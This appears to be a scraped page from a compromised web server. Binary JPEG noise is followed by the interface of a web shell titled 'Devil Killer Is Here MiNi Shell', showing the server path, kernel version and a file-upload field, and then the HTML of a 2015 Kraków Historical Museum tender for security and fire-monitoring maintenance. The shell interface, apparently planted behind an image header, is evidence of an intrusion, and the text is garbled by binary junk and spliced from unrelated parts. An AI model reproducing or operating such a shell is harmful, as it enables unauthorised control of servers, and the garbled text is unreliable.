JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/167525-N-2015.html

<p class="kh_header"><b>Kraków: usługi konserwacji i naprawy systemów zabezpieczenia technicznego oraz usługi w zakresie monitoringu pożarowego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa</b><br>
<b>Numer ogłoszenia: 167525 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Historyczne Miasta Krakowa , Rynek Główny 35, 31-011 Kraków, woj. małopolskie, tel. 012 422 32 64, faks 012 422 32 64.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mhk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi konserwacji i naprawy systemów zabezpieczenia technicznego oraz usługi w zakresie monitoringu pożarowego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi konserwacji i naprawy systemów zabezpieczenia technicznego oraz usługi w zakresie monitoringu pożarowego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa zgodnie z wymaganiami, standardami  wynikającymi z europejskich i polskich norm. Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 do siwz.
2.	Usługą, o której mowa w ust. 1 objęte są następujące systemy:
1)	system sygnalizacji włamania i napadu;
2)	system kontroli dostępu;
3)	system telewizji dozorowej;
4)	system sygnalizacji pożaru;
5)	dźwiękowy system ostrzegania;
6)	system oświetlenia ewakuacyjnego;
7)	monitoring pożarowy.
3.	Usługa, o której mowa w ust. 1 ma na celu zapewnienie utrzymania systemów wymienionych w ust. 2 oraz urządzeń wyszczególnionych w Opisie przedmiotu zamówienia w stałej sprawności technicznej.
4.	Przedmiot zamówienia obejmuje trzy części szczegółowo opisane w załączniku nr 1 do siwz.
1)	Część I obejmuje:
a)	System Sygnalizacji Włamania i Napadu	SSWiN,
b)	System Kontroli Dostępu	KD,
c)	System Telewizji Dozorowej CCTV	(oprócz Podziemia Rynku - Trasa Turystyczna)
2)	Część II obejmuje System Telewizji Dozorowej	CCTV w oddziale Podziemia Rynku - Trasa Turystyczna
3)	Część III obejmuje:
a)	System Sygnalizacji Pożaru 	SSP,
b)	Dźwiękowy System Ostrzegania	DSO,
c)	 System Oświetlenia Ewakuacyjnego	SOE,
d)	 Monitoring Pożarowy	MP	
5.	Usługa, o której mowa w ust. 1 będzie świadczona w oddziałach i obiektach Zamawiającego w następujących lokalizacjach: 
1)	Oddział Muzeum Historycznego Miasta Krakowa - Apteka pod Orłem, Plac Bohaterów Getta 18, 30-547 Kraków,
2)	Pałac Krzysztofory, Rynek Główny 35, 31-011 Kraków
3)	Pałac Krzysztofory, ul. Jagiellońska 2- 4, Kraków,
4)	Oddział Muzeum Historycznego Miasta Krakowa - Kamienica Hipolitów, Plac Mariacki 3, 31-042 Kraków,
5)	Oddział Muzeum Historycznego Miasta Krakowa - Dom pod Krzyżem, Szpitalna 21, 31-024 Kraków,
6)	Oddział Muzeum Historycznego Miasta Krakowa - Celestat, ul. Lubicz 16, 31-504 Kraków,
7)	Oddział Muzeum Historycznego Miasta Krakowa - Wieża Ratuszowa, ul. Rynek Główny 1, 31-001 Kraków,
8)	Oddział Muzeum Historycznego Miasta Krakowa - Stara Synagoga, ul. Szeroka 24, 31-053 Kraków,
9)	Oddział Muzeum Historycznego Miasta Krakowa - Dom Zwierzyniecki, ul. Królowej Jadwigi 41, 30-209 Kraków,
10)	Oddział Muzeum Historycznego Miasta Krakowa - Mury Obronne, ul. Pijarska, 30-547 Kraków,
11)	Oddział Muzeum Historycznego Miasta Krakowa - Podziemia Rynku - Trasa Turystyczna, Rynek Główny 1, 31-042 Kraków,
12)	Oddział Muzeum Historycznego Miasta Krakowa - Dzieje Nowej Huty, os. Słoneczne 16, 31-958 Kraków,
13)	Oddział Muzeum Historycznego Miasta Krakowa - Ulica Pomorska, ul. Pomorska 2, 30-039 Kraków,
14)	Obiekt Muzeum Historycznego Miasta Krakowa - Pomieszczenia Magazynowe, ul. St. ze Skalbmierza 7, Kraków,
15)	Oddział Muzeum Historycznego Miasta Krakowa - Fabryka Schindlera, ul Lipowa 4, 30-702 Kraków,
16)	Oddział Muzeum Historycznego Miasta Krakowa - Barbakan, ul. Basztowa, 30-547 Kraków,
17)	Oddział Muzeum Historycznego Miasta Krakowa - Thesaurus Cracoviensis, ul. Księcia Józefa 337, 30-243 Kraków..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1. pkt. 6 ustawy stanowiących nie więcej niż 50%  wartości zamówienia podstawowego dla każdej z części</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-0, 50.34.00.00-0, 50.32.41.00-3, 50.32.42.00-4, 50.61.00.00-4, 50.34.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie części III:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada aktualne na dzień składania ofert zezwolenie wydane przez Prezesa Państwowej Agencji Atomistyki na prowadzenie działalności polegającej na instalowaniu, stosowaniu i obsłudze urządzeń zawierających źródła promieniotwórcze wydane na podstawie ustawy z dnia 29 listopada 2000 r. Prawo atomowe (tj. Dz.U. z 2014 r., poz. 1512 ze zm.)
Metoda spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Cześć I:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługi konserwacji lub serwisu trwające nieprzerwanie min. 12 miesięcy do dnia składania ofert każda, obejmujące swym zakresem wszystkie poniżej wymienione czynności tj.
a)	konserwację lub serwis systemu sygnalizacji włamania i napadu;
b)	konserwację lub serwis systemu kontroli dostępu;
c)	konserwację lub serwis systemu telewizji dozorowej.
Zamawiający przyjmie, iż powyższy warunek został spełniony jeśli Wykonawca wykaże realizacje usług w zakresach wskazanych w lit. a-c zarówno w ramach jednego zamówienia (jednej umowy) jak i w ramach co najwyżej 3 zamówień (trzech umów), odrębnie dla każdego zakresu).

Część II:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje zamówienie na konserwację lub serwis trwające nieprzerwanie min. 12  miesięcy do dnia składania ofert, obejmujące swym zakresem konserwację lub serwis systemu telewizji dozorowej cyfrowej (IP) z min. 50 sztuk  kamer i co najmniej 3 rejestratorami cyfrowymi. 

Część III:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługi konserwacji lub serwisu trwające nieprzerwanie min. 12 miesięcy do dnia składania ofert każde, obejmujące swym zakresem wszystkie poniżej wymienione czynności tj.
a)	konserwację lub serwis systemu sygnalizacji pożaru;
b)	konserwację lub serwis dźwiękowego systemu ostrzegania;
c)	konserwację lub serwis systemu oświetlenia ewakuacyjnego;
d)	monitoring pożarowy.
Zamawiający przyjmie, iż powyższy warunek został spełniony jeśli Wykonawca wykaże realizacje usług w zakresach wskazanych w lit. a-d zarówno w ramach jednego zamówienia (jednej umowy) jak i w ramach co najwyżej 4 zamówień (czterech umów), odrębnie dla każdego zakresu. Metoda spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż dysponuje co najmniej 3 osobami:
a)	z których każda posiada doświadczenie w zakresie konserwacji lub serwisu systemów sygnalizacji włamania i napadu, kontroli dostępu oraz telewizji dozorowej,
b)	z których każda w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonała lub wykonuje dwie usługi, z których każda trwa/trwała nieprzerwanie co najmniej 12 miesięcy do dnia składania ofert i z których każda dotyczy konserwacji lub serwisu systemów sygnalizacji włamania i napadu, kontroli dostępu oraz telewizji dozorowej,
c)	z których co najmniej 2 osoby są przeszkolone w Narodowym Instytucie Muzealnictwa i Ochrony Zbiorów (dawniej: Ośrodek Ochrony Zbiorów Publicznych) i posiadają aktualne na dzień składania ofert zaświadczenia o ukończeniu ww. przeszkolenia,
d)	z których co najmniej 1 osoba będzie osobą nadzorującą, przeszkoloną w Narodowym Instytucie Muzealnictwa i Ochrony Zbiorów (dawniej: Ośrodek Ochrony Zbiorów Publicznych) i posiadającą aktualne na dzień składania ofert zaświadczenia o ukończeniu ww. przeszkolenia, uprawnienia do projektowania systemów zabezpieczeń klas SA1-SA4 oraz posiadającą aktualne na dzień składania ofert świadectwo kwalifikacyjne grupy I kategorii E uprawniające do eksploatacji urządzeń, instalacji i sieci o napięciu nie wyższym niż 1 kV odpowiadające wymaganiom określonym w Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2003 Nr 89, poz. 828).
Jeżeli wykonawca wykaże więcej osób niż jest to wymagane, każda następna osoba również winna spełniać powyższe warunki.

Część II:

Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż dysponuje: co najmniej 2 osobami:
a)	z których każda posiada doświadczenie w zakresie konserwacji lub serwisu systemu telewizji dozorowej cyfrowej (IP),
b)	z których każda  w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonała lub wykonuje dwie usługi, z których każda trwa/trwała nieprzerwanie co najmniej 12 miesięcy do dnia składania ofert i z których każda dotyczy/dotyczyła konserwacji lub serwisu telewizji dozorowej cyfrowej (IP) z min. 50 sztuk kamer i co najmniej 3 rejestratorami cyfrowymi,
c)	 z których każda została przeszkolona w Narodowym Instytucie Muzealnictwa i Ochrony Zbiorów (dawniej: Ośrodek Ochrony Zbiorów Publicznych) i posiadają aktualne na dzień składania ofert zaświadczenia o ukończeniu ww. przeszkolenia,
d)	z których każda posiada aktualne na dzień składania ofert świadectwo kwalifikacyjne grupy I kategorii E uprawniające do eksploatacji urządzeń, instalacji i sieci o napięciu nie wyższym niż 1 kV odpowiadające wymaganiom określonym w Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2003 Nr 89, poz. 828).
Jeżeli wykonawca wykaże więcej osób niż jest to wymagane, każda następna osoba również winna spełniać powyższe warunki.

Część III:

Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż dysponuje: co najmniej 2 osobami:
a)	z których każda posiada doświadczenie w zakresie konserwacji lub serwisu systemu systemów sygnalizacji pożaru, dźwiękowego systemu ostrzegania, oświetlenia ewakuacyjnego oraz monitoringu pożarowego, 
b)	z których każda w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonała lub wykonuje dwie usługi, z których każda trwa/trwała nieprzerwanie co najmniej 12 miesięcy do dnia składania ofert i z których każda dotyczy/dotyczyła konserwacji lub serwisu systemów sygnalizacji pożaru, dźwiękowego systemu ostrzegania, oświetlenia ewakuacyjnego  oraz monitoringu pożarowego,
c)	 z których każda została przeszkolona w Narodowym Instytucie Muzealnictwa i Ochrony Zbiorów (dawniej: Ośrodek Ochrony Zbiorów Publicznych) i posiada aktualne na dzień składania ofert zaświadczenia o ukończeniu ww. przeszkolenia,
d)	z których każda posiada aktualne na dzień składania ofert świadectwo kwalifikacyjne grupy I kategorii E uprawniające do eksploatacji urządzeń, instalacji i sieci o napięciu nie wyższym niż 1 kV odpowiadające wymaganiom określonym w Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2003 Nr 89, poz. 828).
Jeżeli wykonawca wykaże więcej osób niż jest to wymagane, każda następna osoba winna spełniać powyższe warunki.

Dotyczy wszystkich części:
Zamawiający nie dopuszcza do posługiwania się tymi samymi osobami w celu wykazania spełniania warunku udziału w zakresie dysponowania osobami zdolnymi do wykonania zamówienia,  jeżeli wykonawca składa ofertę na więcej niż jedną część. Zamówienie będzie realizowane tylko przez osoby wskazane w wykazie i spełniające powyższe warunki. Każda dodatkowa osoba wskazana do realizacji zamówienia winna spełniać wymogi określone w siwz
Metoda spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1. w zakresie części I wykonał lub wykonuje usługi konserwacji lub serwisu trwające nieprzerwanie min. 12 miesięcy do dnia składania ofert każda, obejmujące swym zakresem wszystkie poniżej wymienione czynności tj.
1)konserwację lub serwis systemu sygnalizacji włamania i napadu;
2)konserwację lub serwis systemu kontroli dostępu;
3)konserwację lub serwis systemu telewizji dozorowej.
Zamawiający przyjmie, iż powyższy warunek został spełniony, jeśli Wykonawca wykaże realizacje usług w zakresach wskazanych w pkt. 1-3 zarówno w ramach jednego zamówienia (jednej umowy) jak i w ramach co najwyżej 3 zamówień (trzech umów), odrębnie dla każdego zakresu).
2. W zakresie części II wykonał lub wykonuje zamówienie (tj. umowę) konserwacji lub serwisu trwającą nieprzerwanie min. 12 miesięcy do dnia składania ofert, obejmujące swym zakresem konserwację lub serwis systemu telewizji dozorowej cyfrowej (IP) z min. 50 sztuk  kamer i co najmniej 3 rejestratorami cyfrowymi. 
3. W zakresie części III wykonał lub wykonuje usługi konserwacji lub serwisu trwające nieprzerwanie min. 12 miesięcy do dnia składania ofert każde, obejmujące swym zakresem wszystkie poniżej wymienione czynności tj.
1) konserwację lub serwis systemu sygnalizacji pożaru;
2) konserwację lub serwis dźwiękowego systemu ostrzegania;
3) konserwację lub serwis systemu oświetlenia ewakuacyjnego;
4) monitoring pożarowy.
Zamawiający przyjmie, iż powyższy warunek został spełniony jeśli Wykonawca wykaże realizacje usług w zakresach wskazanych w pkt. 1-4 zarówno w ramach jednego zamówienia (jednej umowy) jak i w ramach co najwyżej 4 zamówień (czterech umów), odrębnie dla każdego zakresu;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zobowiązanie podmiotów w oryginale lub inny dokument - w przypadku gdy Wykonawca wykazując spełnianie warunków, o których mowa w Rozdziale 5 siwz polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp; 2. pełnomocnictwo, w przypadkach, o których mowa w rozdziale 10 ust. 4 siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Czas naprawy - 10</li>
<li>3 - CZas rekacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wprowadzenie zmian do treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu - przy uwzględnieniu art. 144 ust. 1 ustawy Prawo Zamówień Publicznych.
2.	Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
1)	nastąpi zmiana regulacji prawnych obowiązujących w dniu podpisania umowy, wówczas za niezmienną uznaje się cenę netto;.
2)	nastąpi zmiana terminu wykonywania usługi w przypadku przerwania świadczenia usługi z przyczyn niezawinionych przez Strony umowy, wówczas Strony umowy doliczą okres przerwy do terminu realizacji;
3)	Zamawiający odstąpi albo wypowie umowę w części w przypadku zaistnienia okoliczności  określonych w § 12 niniejszej umowy;
4)	zmiana terminu realizacji zamówienia podyktowana działaniami podmiotów trzecich, np. przedłużanie terminów wydania przez inne podmioty wymaganych badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę - wówczas Strony umowy doliczą do pierwotnego terminu okres stanowiący różnicę pomiędzy terminem pierwotnym przewidzianym na ich wydanie a terminem faktycznym;
